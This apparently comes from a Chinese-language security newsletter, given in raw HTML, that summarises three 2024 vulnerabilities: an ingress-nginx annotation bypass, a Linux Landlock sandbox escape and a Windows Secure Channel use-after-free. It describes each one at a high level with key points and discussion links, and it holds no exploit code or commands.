		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">CVE-2024-7646 是一种影响流行的 Kubernetes 组件 ingress-nginx 的安全漏洞，允许攻击者绕过注解验证，可能导致对敏感集群资源的未授权访问，该漏洞的 CVSS v3.1 基础分数为 8.8（高）。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5185546875" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1024" src="https://wechat2rss.xlab.app/img-proxy/?k=33313e96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgu3TxCICXnnyrl2weANNrekozFXZ5gwgTE6M6oviaa2LmYxfXlbhhSow%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ingress-NGINX 出现漏洞 CVE-2024-7646: 注解验证绕过</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ingress-NGINX 漏洞CVE-2024-7646：注解验证绕过</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgu5sA4L0h2kAmUyyVK9qAJegCllrohIRvibRDC5ZyYmIdL928yGvbuhw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgu5sA4L0h2kAmUyyVK9qAJegCllrohIRvibRDC5ZyYmIdL928yGvbuhw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5122818452884884"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Ingress-nginx 是一个流行的 Kubernetes ingress 控制器，用于管理集群内服务的外部访问，充当反向代理和负载均衡器。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该漏洞的严重性体现在，它可能导致对集群的完全破坏，包括对机密性、完整性和可用性的影响。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尤其对于多租户环境和缺乏适当访问控制的集群来说，这个漏洞危险性极高。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过创建包含特殊注解的恶意 Ingress 对象来利用这一漏洞，从而绕过验证并执行任意命令。</section></li></ul>
	<br/>
	<p>🏷️: Kubernetes, ingress-nginx, 漏洞, 安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x12
			 Linux内核修复Landlock安全漏洞</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Mickaël Salaün 报告了 Landlock 的安全漏洞（CVE-2024-42318），该漏洞允许进程逃逸沙箱并绕过限制，已在 Linux 6.11-rc1 中修复，并已回退到多个版本的 Linux 内核。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Landlock 漏洞 CVE-2024-42318 允许进程逃逸沙箱</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgIMOfL1yuiaiaey7uM8vOXmzazpCWAMjf5YRShNfRylHHqWC1r7FbOfgg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgIMOfL1yuiaiaey7uM8vOXmzazpCWAMjf5YRShNfRylHHqWC1r7FbOfgg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8855181428254482"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Landlock 漏洞（CVE-2024-42318）: 该漏洞允许进程逃逸沙箱，已得到修复和测试，确保不会再次发生。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">内核更新的重要性: 修复漏洞只需更新内核，而不需要更新沙箱程序。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Landlock 的作用: Landlock 是一种深度防御机制，增强了系统的安全性，但不应作为唯一的安全层。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全机制的叠加: 通过 seccomp 过滤器等技术可以进一步减少任意代码执行和系统调用的风险。</section></li></ul>
	<br/>
	<p>🏷️: Linux, 安全漏洞, Landlock, 内核修复</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x13
			 Windows Secure Channel RCE漏洞CVE-2024-38148详解</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了 Windows Secure Channel 中的一个Use-After-Free（UAF）漏洞（CVE-2024-38148），该漏洞可能被利用实现远程代码执行。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.7034883720930233" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=c87ca711&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgibU3Q3FcLBSsdZarw6UrVFAibuXlX5esxRyWPMibgthaFnJhUSsNDGmoA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.3111111111111111" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f1af7c17&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgmFZ5XMZpmlib7IcjR7yfkUgibsficjUuuS7LYicgG8ibzc7TrXYSRaZ3xfw%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.34140969162995594" data-w="908" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=df4a1110&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgiaX4Jw6GGMawTJx1tM1eNPMN3sOibal88cwTXPARcaibauh63b2XZxkKA%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows 安全通道 RCE 分析：MSRC 认定为拒绝服务</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Windows Secure Channel 远程代码执行漏洞 CVE-2024-38148 简介</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgYQQKqdXibxiaQ25Tw7f6nouOaO0U6ptbU0Z1LLATxYx0GibqfGLzmZgkA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnpzXhHJwRsVFic7Sia3MqiaTgYQQKqdXibxiaQ25Tw7f6nouOaO0U6ptbU0Z1LLATxYx0GibqfGLzmZgkA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4844181224118218"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
